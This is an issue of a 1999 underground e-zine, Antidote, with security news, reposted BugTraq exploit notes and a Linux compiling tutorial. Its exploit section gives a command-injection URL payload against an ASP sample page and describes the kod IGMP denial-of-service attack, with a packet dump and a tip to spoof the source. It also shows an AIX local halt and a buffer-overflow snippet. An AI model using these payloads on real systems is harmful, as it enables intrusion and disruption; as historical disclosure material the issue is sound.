Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 13
Volume 2 Issue 13
8/19/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** * ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n";
------------------------------
In this issue of Antidote, we have over 690 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
-)!-- Contents //--(-
0.0 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing
1.00 - News
1.01 - Chinese Engineer accused of posting Secrets Online
1.02 - More on PacketStorm
1.03 - Mitnick Sentancing postponed Again
1.04 - CD-PROM: Anti-warez Hardware
1.05 - House says info not aimed at US
1.06 - Use encryption, go to jail?
1.07 - Hole opens Office 97 users to Hijack
2.00 - Exploits (new & older)
2.01 - ODBC.asp.sample_page.txt
2.02 - more.info_on.kod.c.txt
2.03 - local.halt.aix.txt
3.00 - Misc
3.01 - Statement by OptikLenz
3.02 - Compiling Linux Source Code
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
http://browse.thepoison.org
www.403-security.org
www.hackernews.com
------------------------------
-)!-- 0.00 - Beginning //--(-
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on there hands and are bored with nothing to do. If you want to read a maga-
zine that teaches you how to hack etc, then you might want to go to your local book-
store and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all e-
mails no matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Authors\\=--
Lord Oak is the founder and current president of Antidote. Most work is done by him.
Please feel free to e-mail him at: lordoak@thepoison.org
Duece is the co-founder and co-president of Antidote, some work is done by him when
he comes online. Feel free to e-mail him at: duece@thepoison.org
ox1dation not really an author, just someone that helps us out a lot and we consider
him as an author! His e-mail address is: ox1dation@thepoison.org
------------------------------
0.04 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
oX1dation PBBSER
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.05 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on
writing something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
-)!-- 1.00 - News //--(-
1.01 --=\\Chinese Engineer accused of posting Secrets Online\\=--
[www.nandotimes.com]
A Chinese engineer has been arrested on charges of posting secrets about a new warplane
to an Internet bulletin board, a newspaper reported Wednesday.
Authorities tracked down the engineer after the article posted in May spread to other
Internet sites, the state-run China Business Times reported.
The newspaper identified the engineer only by his surname, Guo.
The article he published allegedly touched on secrets about a new fighter plane that he
learned about while working at a research institute in the southwestern city of Cheng-
du, the newspaper said.
The newspaper alleged that Guo posted the article to show off a specialist's knowledge
of military affairs.
Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state
secrets, the newspaper said.
http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html
------------------------------
1.02 --=\\More on PacketStorm\\=--
hey,
i've been working very hard with numerous corporate entities
to try to get the web site back up and online as soon as possible.
everything is looking very good now, and i hope to have the site
back up and better than ever RSN (Real Soon Now). hopefully, the
site will be run and hosted by a professional security firm (to be
named at the appropriate time), and the new site will be more
professionally maintained by a full staff of security experts,
administrators, and web designers. with a very substantial amount
of corporate funding, the new Packet Storm Security will be a
completely revamped site with more features, more updates, more
bandwidth, more of everything.
news and updates will be posted here as soon as i get confirmation
of the new plans, and contracts are signed.
Ken Williams
------------------------------
1.03 --=\\Mitnick Sentancing postponed Again\\=--
[www.zdnet.com]
The sentencing of convicted hacker Kevin Mitnick was postponed for a second time today.
The government is asking for Mitnick to be responsible for restitution on the order of
$1.5 million, while the defense is asking for payments on the order of $5,000, based on
his projected earnings potential during his supervised release. He will not be able to
use a computer during that three year-period
http://www.zdnet.com/zdnn/filters/bursts/0,3422,2302198,00.html
------------------------------
1.04 --=\\CD-PROM: Anti-warez Hardware\\=--
[www.expressnews.com]
Software pirates have a new technological hurdle ahead of them. Kodak has developed a
way to make CD programs more secure from hackers and unlicensed users.
It's a customized CD called the CD-PROM (Compact Disc-Programmable ROM). This includes
the standard write-once feature of commercial software, but the CD-PROM also includes a
recordable feature that identifies a particular computer to the CD.
"There's a lot of enthusiasm for this technology," said Bruce Ha, senior research asso-
ciate at the Eastman Kodak Co. of Rochester, N.Y. "It's a format that people have been
talking about for the past 10 years now."
The new hybrid technology allows software manufacturers to produce low-cost CD-ROMs
with the ability to add CD-R (recordable) information. CD-PROM works like a normal CD
software product, but using the software requires start-up information specific to the
licensed consumer.
For instance, many software CDs require a registration code to unlock some or all of
the program's features. To get the registration code, consumers can register their
software online with the software manufacturer. To thwart Internet hackers, the CD-PROM
will match the registration code with the licensed software, thus keeping hackers from
using an illegal copy of the software.
Similarly, a CD-PROM is designed to work on software shipped with a specific computer.
The CD-PROM can be set up to read only the BIOS information on the computer with which
it was shipped. The BIOS (basic input/output system) loads and executes the computer's
operating system, such as Windows 98.
"So (Microsoft) Office or any other program that comes bundled with that computer can-
not be shared by anyone else," Ha said.
But making a CD-PROM has been difficult.
A normal CD contains data embedded into "pits" that are pressed into the platter. The
platter is then covered by an aluminum reflective layer and a protective plastic coat-
ing.
On a CD-R, a single groove is pressed into the platter instead of pits. An organic dye
is added for recording new information onto the platter. A reflective layer of gold or
silver covers the dye, and then the CD gets a protective coating.
Some manufacturers have tried to add both pits and grooves onto a CD. But they have had
problems with the disc being read properly. This can occur when the ROM reader switches
to the recordable writer, or because the speed of the laser light reading the CD chang-
es when it goes through different materials on the platter.
To get around this, Kodak decided to use a single, continuous groove pressed into the
platter. The master disc is designed to make the CD reader think that the groove actu-
ally contains a series of pits.
Kodak is using the CD-PROM for its Picture CD product. Ha says no failures have been
noticed after beta testing 20,000 discs in photo labs.
http://www.expressnews.com/pantheon/news-bus/sheron-tech/2504rkodak_7-25nz.shtml
------------------------------
1.05 --=\\House says info not aimed at US\\=--
[www.washtimes.com]
White House spokesman David Leavy on Thursday adamantly denied a new International Pub-
lic Information (IPI) system would be directed at American audiences.
IPI is a secret Clinton administration program to control public information dissemina-
ted by the departments of State and Defense and intelligence agencies.
It is meant to "influence foreign audiences in a way favorable to the achievement of
U.S. foreign-policy objectives," according to a draft IPI charter obtained by The Wash-
ington Times.
"That is totally inaccurate," Mr. Leavy said. "The IPI initiative is designed to better
organize the government and the instruments we have to support our public diplomacy,
military activities and economic engagement overseas. There is no impact on the domes-
tic press."
Mr. Leavy said that U.S. information officials at home and abroad serve different func-
tions.
"There are officers who work with the media in the United States and officers who sup-
port the U.S. policy overseas. They are totally separate. They are totally different
functions," Mr. Leavy said.
But a former deputy chief of the U.S. Information Agency (USIA) under three presidents
said he fears the IPI plan would mean U.S. propaganda aimed at foreigners would be used
to influence American elections.
Gene Kopp, who served under Presidents Nixon, Ford and Bush, said the elections of
President Kennedy and President Carter were directly influenced by leaks of USIA for-
eign public-opinion polls showing a decline in U.S. prestige abroad.
"I am concerned this could happen again under the IPI plan," said Mr. Kopp, currently a
Washington lawyer. "The administration is transferring all assets, except broadcasting,
to State, where they will not be separated in any way. It will be very difficult to
separate what is disseminated in the United States and overseas."
He said that the opportunity for abusing the system will be great.
"The temptation to spin this stuff in a partisan way will be very strong -- probably
irresistible," he said. "The other ominous feature is that this includes the intelli-
gence agencies. They are in the business of misinformation. God only knows where that
goes."
New allegations emerged Thursday that the Clinton administration has been trying to
control how American news organizations cover foreign affairs, at least since the Bos-
nia peacekeeping mission in 1996.
According to a former government official, who insisted on anonymity, the White House
created a Strategic Planning Directorate, which used the State Department and USIA to
pressure American reporters into favorable coverage of the U.S. troop deployment in
Bosnia-Herzegovina.
It came into being just prior to the 1996 presidential election.
"I heard them talk about it in conference telephone calls --how they had to control the
media out there, the bureau chiefs, because if the Republicans picked this up [the
Clinton administration] would be exposed as having no foreign policy," said the former
government official.
Shortly after President Clinton won re-election in 1996, the administration announced
that U.S. troops would not be home by Christmas, as promised. Today, nearly three years
later, some 7,000 U.S. troops remain in Bosnia.
"The U.S. public wanted to know how long American troops had to be there," said the ex-
official. "The Clinton people said 'only one year,' and [that] they would be home in
December, after the election. But everyone knew the only way to keep the warring sides
apart was robust international and American presence."
This former official said this was widely discussed.
"In the conference calls, they openly discussed how they had to prevent American jour-
nalists from discussing this," he said.
The source said that USIA officials and National Security Adviser Samuel R. Berger
tried to convince American editors not to publish accounts by their reporters who wrote
that Bosnia was unsafe for Americans, that Muslim extremists were a threat, and that
the warring sides would never be pacified.
Ivo Daalder, who was a staffer on the National Security Council at the time, said dis-
cussions had no ulterior motives.
Mr. Daalder, who is now at the Brookings Institution, said the talks among the USIA,
National Security Council and other agencies "had the sole purpose of making sure they
share information among them, and when the U.S. government speaks to the outside world,
it does so in a coordinated manner."
Mr. Daalder said "there was no deliberate campaign designed to put out false informa-
tion prior to the 1996 presidential election."
He said that USIA did increase staffing and efforts to convince American reporters in
Bosnia of the administration's perspective in September, prior to the Bosnian elec-
tions.
http://www.washtimes.com/news/news3.html
------------------------------
1.06 --=\\Use encryption, go to jail?\\=--
[www.cnn.com]
Encryption users could face up to two years in prison for refusing to hand over the
keys to their code, according to Britain's proposed Electronic Communications Bill.
The bill is causing concern among privacy advocates and opposition parties, who say the
bill gives law enforcement wide-reaching power over private Internet communications.
Most aggravating, the bill calls for a possible two years in prison for anyone refusing
to turn over the encryption key or the message in plain text to law-enforcement offic-
ials. It also calls for a five-year prison term for tipping off senders that they are
being investigated, according to Caspar Bowden, director of the London-based Foundation
for Information Policy Research.
Even discussing an investigation in public, such as complaining about alleged abuses of
law enforcement to the media, may also be punishable by imprisonment, said Bowden.
"Let's say that someone under investigation sends me a message with encryption that can
only be decrypted by the receiver. The authorities come to me and tell me that they are
investigating someone, but won't tell me who, so they ask for all my private keys,"
Bowden said. Refusing this request from the authorities could get him two years in pri-
son, said Bowden.
In such a case, the authorities would have all of Bowden's private keys, enabling law
enforcement to read all encrypted correspondence that was sent to him. Bowden would
then have no choice, he said, because by informing anyone of this, and asking them to
change their key, he would break the "tipping off" clause of the bill and in turn and
face five years imprisonment.
"I can't complain to the newspaper, otherwise it's five years in jail. All I can do is
go to a secret tribunal," Bowden said. He's not joking: The tribunal is five judges, on
y two have to participate, and only one has to lay the groundwork, he added.
Bowden feels that the entire bill needs to be re-examined by the U.K.'s Department of
Trade and Industry. "We would like to see the Electronic Communication Bill be about e-
ommerce, which is what they said; the law-enforcement section doesn't even belong in
it" he added.
There is also another method of hiding messages, called steganography. It's not really
clear to commentators such as Bowden whether or not steganography is covered by the
bill. With steganography, users can "sprinkle an encrypted message" into a photographic
format, such as JPEG, or a music format such as MP3, both of which are very popular
online. In actuality, the message does not necessarily need to be encrypted, just con-
ealed within the file, according to Bowden.
Although the bill does not mention technologies such as steganography, Bowden specula-
ed that the authorities could enforce regulations in those cases by proving that there
was a reason to search, such as the existence of a steganography program on the sus-
ects computer.
http://www.cnn.com/TECH/computing/9907/29/ukencrypt.idg/index.html
------------------------------
1.07 --=\\Hole opens Office 97 users to Hijack\\=--
[www.msnbc.com]
THE VULNERABILITY IS CONTAINED in the Jet 3.51 driver (ODBCJT32.DLL) that was shipped
with the popular Office 97 software suite. (Microsoft is a partner in MSNBC.)
Juan Carlos G. Cuartango, a Spanish Web developer who has discovered other important
security holes, reported the problem to the NTBugTraq mailing list Thursday afternoon.
Later Thursday, the Microsoft Security Team confirmed the bug in a posting to the same
list.
If you open a malicious Excel worksheet implementing this vulnerability it will send
shell commands to your operating system (Windows NT, 95 and 98 are all affected) that
can: (infect) you (with) a virus, delete your disks, read your files, Cuartango said
in his posting to the list.
(T)he worksheet will get full control over your machine.
The Microsoft posting said the company is preparing to release a security bulletin
dealing with the vulnerability. Shortly before 5 a.m. ET Friday, the bulletin had not
appeared on the Microsoft Office Update site or the Microsoft security site.
Weve verified that this vulnerability in Jet 3.51 does exist, and urge all customers
who are using Jet 3.51 to upgrade to Jet 4.0, the Microsoft mail to NtBugTraq said.
This vulnerability should be taken seriously. Office 97 users in particular should
consider immediately upgrading their database driver to Jet 4.0, as Jet 3.51 is install
d by default in Office 97. Office 2000 users do not need to upgrade, as Office 2000 in-
stalls Jet 4.0 by default.
An Excel worksheet that contains code to take advantage of the vulnerability could be
hidden in a frame on a Web page or sent in an e-mail. As long as the worksheet contain-
ed no macros, there would be no indication to the user who visited the Web page or op-
ened the e-mail that any code had been executed, Cuartango reported. If the file is
sent in e-mail, the recipient must be on-line to be affected, Cuartango said. He reco-
mmended not opening documents you are not expecting to receive and going off-line be-
fore opening e-mail.
If the worksheet were instead sent as an attachment to e-mail, the recipient could a-
void ill effects by not opening the attachment.
To determine whether you are at risk, search your hard drive for a file named
ODBCJT32.DLL. When you locate it, right-click on it and hit Properties... If the ver-
sion number starts with 3.51, you should upgrade the driver as soon as possible.
Microsoft said it would provide detailed instructions for avoiding the problem in its
security bulletin. In the meantime, users at risk can avoid the problem by installing
Microsoft Data Access Components version 2.1, which contains Jet 4.0. MDAC 2.1 is avai-
lable at www.microsoft.com/data/.
Cuartango said he reported the vulnerability a few days ago. He alleged in is posting
that Microsoft was preparing to warn users only because he was taking the issue public.
Microsoft denied the allegation.
http://www.msnbc.com/news/295385.asp#BODY
------------------------------
-)!-- 2.00 - Exploits //--(-
2.01 --=\\ODBC.asp.sample_page.txt\\=--
To: BugTraq
Subject: Yet Another ODBC Bugged ASP Sample Page
Author: Wanderley J. Abreu Junior
Dear Team,
Exploiting ODBC Features that come with your sample programs is
not a mistery for any of us. So Let me add one more ASP Sample with similar
troubles:
http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp
or yet
http://server/AdvWorks/equipment/catalog_type.asp
It lets you execute shell comands like the other scripts. It is
a Active Server Page so it runs the query as a local user and doesn't need
any type of Remote Data Service to access the DSN. It just require the
default DSN (advworks) set.
The Exploit command line can be for instance :
http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c
+dir+c:\")|
Sorry if this SERIOUS security failure was already reported.
Wanderley Junior
------------------------------
2.02 --=\\more.info_on.kod.c.txt\\=--
To: BugTraq
Subject: more detail and summary of kod.c (igmp bug for windows)
Author: klepto <mailto:klepto@levitate.net>
Ok,
Here we go again..
For those who are having trouble with kod, alot of you are using a very old version
which was the first i submitted.
inserted is the lastest version which should work. I wrote kod.c aka cherrycoke.c about
3-4 months ago.
It sends a fragmented igmp packet to a windows client that states that it is not frag-
mented but there are more frags to come windows assembles the packets and dies trying.
Here is a dump of the packet if you want to rewrite it.
/* output via tcpdump or windump95
63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@1480+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@2960+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@4440+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@5920+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@7400+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@8880+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@10360+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@11840+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@13320+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@14800+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128)
*/
::notice the last frag it changed length..
I have also ported kod to windows and please email me if you want a copy of it.
As far as I can tell due to my exaustive research on the subject it works on
95/98/98se/2k(some betas)
Friends of mine such as defile/nyt/ignitor/etc have rewritten kod to suit there needs..
I have tested kod.c out alot on many machines and it works 85% of the time for me.
There are circumstances to why kod doesn't always work, some routers my drop igmp pack-
ets if the source isn't local so try spoofing =). As far as I can see netcom and alot
of .ca servers drop the kod packets.
So please dont bark at me =) I just found the bug, wrote the code and what you do with
it is your concern =).
Patch:
(no hotfix currently)
If you want to protect yourself from kod.c I suggest you get winroute from
www.winroute.com get version 4.. It automatically drops igmp packets incoming and out-
going ha =)
It is also a very good portmapper/NAT firewall/ip masqer as well..
Shoutouts:
amputee/ignitor/nizda/antibyte/codelogic/ill`/chord/cheesebal/traveler/winx/naz/dist/
mrcide/etc... (gotta give shoutouts)
klepto@Efnet
klepto@levitate.net
------------------------------
2.03 --=\\local.halt.aix.txt\\=--
Local users can halt the operating system by 'adb' command under my AIX
box.
Here's a simple C program:
main()
{
int i;
for ( i = 0; i < 10; i++ )
{
}
return 0;
}
I compiled the program and run 'adb':
$ cc -g -o a.out a.c
$ adb a.out -
adb
.main,5:s
a.out: running
Now host halted. AIX 4.2(IBM RS/6000 F50) and AIX 4.3.1(IBM RS/6000 S70)
have 'adb' problem. But AIX 4.3.2 haven't the 'adb' problem. I have tested
it under my AIX box. Is it bug of AIX 4.2, 4.3.1?
GZ Apple
gzapple@21cn.com
------------------------------
-)!-- 3.00 - Misc //--(-
3.01 --=\\Statement by OptikLenz\\=--
Something needs to be said...
First off...
Earlier this year an assembly of organizations decided to release a joint statement
"condemning" Legions. This evidently was before any of them contacted Legions request-
ing information on what the true plight was. Because of some iniquitous media converage
a few people misunderstood our motives. This of course is in regards to the past "China
Human Rights incident".
We wanted to bring a tragic predicament to surface so other people could speak out as
well. The media was misinformed when they reported about our goals to aid these count-
ries in their fight for freedom of speech. They (the media) stated we (Legions) wanted
to damge certain computer networks in other parts of the world. We wanted to help them
with the situation concerning their lack of freedom, and human rights why would we want
to destroy or damage their networks the same networks that give them what little free-
dom they have to communicate as people. That just makes no sense at all. I ask that the
people who joined to make the statement condemning Legions take that into consideration
and next time contact us so that we could discuss things, and clear up misunderstand-
ings. It's not a funny matter when peoples lives, and reputations are at stake.
As hackers the computer has built our lives, and in turn we have built our lives around
the computer we would never choose to harm such a valuable resource. The term hacker
doesn't discriminate. You can be a federal agent, but the best damn coder in the world
and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billion-
aire. Software designers, security specialist the people who help protect your networks
these people are hackers. "Information, and data is to be cherished, (for it can only
build you not hurt you) cultivated and developed not to be annulled or locked up. Hack-
ing is an expansive applied knowledge in any technical field. Destruction, and the un-
schooled acts of those who live with out moral are what separates the "hackers" (those
who's main purpose of life is to learn, expand, and apply what they learn) from those
that go as far as turning the computer on." (-The previous quoted statement was excerp-
ted from Keen Veracity 3 www.underzine.com).
Something serious is going on at the moment. A string of "attacks" against our own gov-
ernment. And till now no one has said anything. The actions of these groups are sin-
cerely half-witted, and absurd for it will at the end accomplish nothing except a few
more long term jail sentences. The current actions of these self-proclaimed "hackers"
have me infuriated. The people DOS'ing government sites, and defacing mil, and gov do-
mains, and damaging information these people aren't hackers they are nothing more than
unschooled adolescent teens with nothing better on their hands. They are an endanger-
ment to the true aspect of computer science dealt with by the hacker community. Call
what they are doing what you want, but don't call it "hacking" because it's not. So
many articles have surfaced which referred to what these cracker cults are doing as
"hacking" ex; "Hackers attack government" - "Hackers strike again" (false) Call them
destructive call them by their first name but for the sake of god don't just yank out
the term "hackers" for a better story for the sake of god don't defile the name
"hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't
be issuing this statement if we didn't.
A government investigation is currently pending on the above matters If we dont do
something about this now the government will surely hold us accountable, and I'm not
talking jail time. We have a lot to lose if we dont stop these people from making us
look bad. Though we are not affliated with them directly certain mainstream media has
left a misleading trail. Some of our rights as computer partisans may be a stake here.
With that said I ask that all sites that archive these senseless hacks suspend docu-
menting these fatuous acts for the time being. The script kiddies that go out and tar-
get government and military servers are media crazy, and you are only adding fuel to
their fire by flashing their work to the public. A note to the lamers This is where it
ENDS... In the end it's what you choose to do that makes you who you are. So make sure
what you choose to do doesn't make you look like an ass.
www.hackernews.com/archive/1999/noaa/index.html
www.hackernews.com/archive/1999/army/index.html
www.hackernews.com/archive/1999/monmouth/index.html
www.hackernews.com/archive/1999/argonne/index.html
www.hackernews.com/archive/1999/nswcl/index.html
www.hackernews.com/archive/1999/senate2/index.html
www.hackernews.com/archive/1999/bnl/index.html
www.hackernews.com/archive/1999/doi/index.html
The above is an archive of recent government, and military site defacements done by
what seems to be comparable to the works of 5 year olds...
Look at the archived sites, and tell me something doesn't need to be done.
Just letting people know we aren't going for their childish actions. We dont advocate
any of the trash being done by these uninspired idiots. we're "hackers" the other white
meat!
------------------------------
3.02 --=\\Compiling Linux Source Code\\=--
OK. You're sick of RPMs and those damn big packages. You want to have more access to
what goes on when you install a program. Hell, that's why you installed Linux in the
first place- to have more control over the operating system. You want to be able to
compile source code. Why? There are quite a few benefits to manually compiling source
code. One is a program generally runs a lot faster when you compile it yourself.
Packages (when I say packages I mean any pre-packaged program- such as Debian's .deb
package or RedHat's .rpm package) are usually compiled for the minimal linux will run
on- a 386. That's not exactly taking advantage of your processor. I recompiled the
kernel for RedHat 5.2 and it ran nearly twice as fast. (Kernel recompilation is another
HOWTO article I'll be submitting soon.) Another advantage of compiling yourself is you
can pick where most program files go with pre-packaged software it goes where it choos-
es, which is not always the best option for a lot of people especially those on net-
worked computer that have some form of sysadmin watching over them. One day an admin is
scanning the /bin directory for SUID root execs and all of a sudden he sees your rpm
copy of KDE sitting there. Yet another advantage of compiling yourself is disk space.
If your /usr partition is filling up, for instance, and you'd like to add another par-
tition to conserve space (mounted on /usr/home, for example) you could simply setup
the program's base directory in /usr/home. This would not be an easy task if you were
trying to install a rpm. Source code is also usually smaller it would take a hell of a
lot less time to compile something rather than waiting for a big ass binary to down-
load. This is why Netscape is so damn big they distribute it precompiled just like most
Windows apps. Also most anything for linux that's remotely hacking related you only
get source code for. These are the advantages to compiling software yourself.
Getting and Decompressing the file
Most source code comes compressed- the extension for this is .tar.gz. This means
the file was tarred- that means it packed the entire source and data files into one big
file- and then it was compressed using gzip. There is another, more efficient method of
compression the bzip2 compression method. These files usually end in .tar.bz2. They are
usually smaller and take less time to download try and make bz2 files your first choice
and tar.gz your second. Some source (usually exploits) aren't compressed at all and
simply end in .c or .cpp which means they are plain source. I'll explain more about
compiling plain source later. To decompress tar.gz files, use the command 'tar -zxf
bob-2.3.tar.gz' (where bob-2.3 is your example file). Tar has the gnu unzipper 'built
in'- that is, that will completely decompress the file with one command. Bzip2 files
require 2 separate commands
'bunzip2 bob-2.3.tar.bz2' (which 'bunzips' the file)
and then you untar it:
'tar -xf bob-2.3.tar'
Usually the best place to decompress files in in the /usr/local directory. Unlike Win-
dows, Unix has a very well defined directory tree and /usr/local/is the general 'put
new shit here' directory. There are others, also, such as just /usr or /home, but this
is the one I generally use. If you're only temporarily creating a directory just to
compile and are then deleteing this directory, you can pretty much ignore this. But
bear in mind some larger programs can't have their compilation directory deleted. Check
the docs included for details. Once you have decompressed the file usually there is a
directory created which is similar to the filename. In this case, let's say a directory
called bob was created in /usr/local. Change directory into your newly created 'bob
directory (I hope to god you know how to do this) and take a look around. The first
file that should catch your attention is something similar to INSTALL or README. Take a
look at this file, beacuse there might be some evironment variables you need to set up
or a library needed before the program will run right. By the way.. do this at the con-
sole or in an xterm... you can't point and click your way throught this. Usually there
are 3 basic commands to compiling unix source code:
./configure which is a shell script that is run to configure the Makefile etc.
for your system,
make which actually does the compiling,
make install which copies the newly created binaries and libraries to various
places on your system.
Run each of these one at a time, because if you run a command like:
./configure ; make ; make install
to do it all at once and you get a screenful of error messages you won't know on which
step the error occured. With most programs, after the source has sucessfully compiled,
you can change to a higher directory and delete the temporary created one (bob in this
case).
Take note though some programs don't adhere to this rule (KDE is a good example) be-
cause it needs certain data files and directories to run right.
If You Get Errors
This is the part where you really have to evaluate what's going on- you have to use
some (gasp) common sense. If you run ./configure and it complains about lib.qt.so being
missing you probably are missing the Qt libraries. Remember, if you are compiling a
program you have to have not only the libraries it depends on installed and you're on a
package-based system you must also have its devel libraries. In this case, even if you
had the qt rpm installed you'd still need the qt-devel rpm installed.
If you run ./configure and it complains about a variable not being set, check the IN-
STALL or README file and see if it says anything about variables needing to be set on
where the program is. Remember, don't just set the variable and try to recompile... you
have to put a reference to it in the script that's executed when you log in. Otherwise
the variable will be lost when you log out. For example, if you're tryig to compile KDE
and it complains about the $KDEDIR variable not being set, you would edit your
~/.bash_profile (if you use the bash shell) and add 'KDEDIR = /usr/local/kde' (w/o the
quotes) and also add the word export $KDEDIR at the bottom of the script.
If you use tcsh, you need to edit your ~/.tcshrc and add /KDEDIR '/usr/local/kde'/
(w/o the slashes) but you don't have to add an export line at the bottom.
Use some common sense, and if it still doesn't compile try and go to the program's web
page and take a look at the FAQ or Docs section.
Compiling Scripts
Files you download that are just simple C or C++ source will have the extension .c ,
.cpp or .c++ and will usually be just one or two files. They usually have instructions
and specific compiler options written in them... take notice of this.Open up the file
in your favorite editor and check.
If they don't, you should be able to compile them by typing:
gcc filename.c -o filename
If it's a c++ file, you might have to try something a little different, like
c++ filename.cpp -o filename
or for C source
cc filename.c -o filename
The -o means 'output the binary to this file' - this is what you want the binary to be
named. Then you should be able to execute it by typing ./filename
Some files are shell scripts... they have extensions like .sh or .bash. These you
should be able to execute simply by typing bash <file name> or just execute it
(./file). This is not source code... it's just a script.
Well that's about it for this article... remember to RTFM and use your head... don't
keep emailing the coder of the program asking for help... this is very annoying and he
has other things to do.
Keep a look out for the next file I'm writing... recompiling the linux kernel for sec-
urity and speed. Keep it real... and don't be lame.
Floyd Pinkerton July '99
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #1- .
. .
. "Good for girl to meet boy in park, better for boy to park meat in girl." .
. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
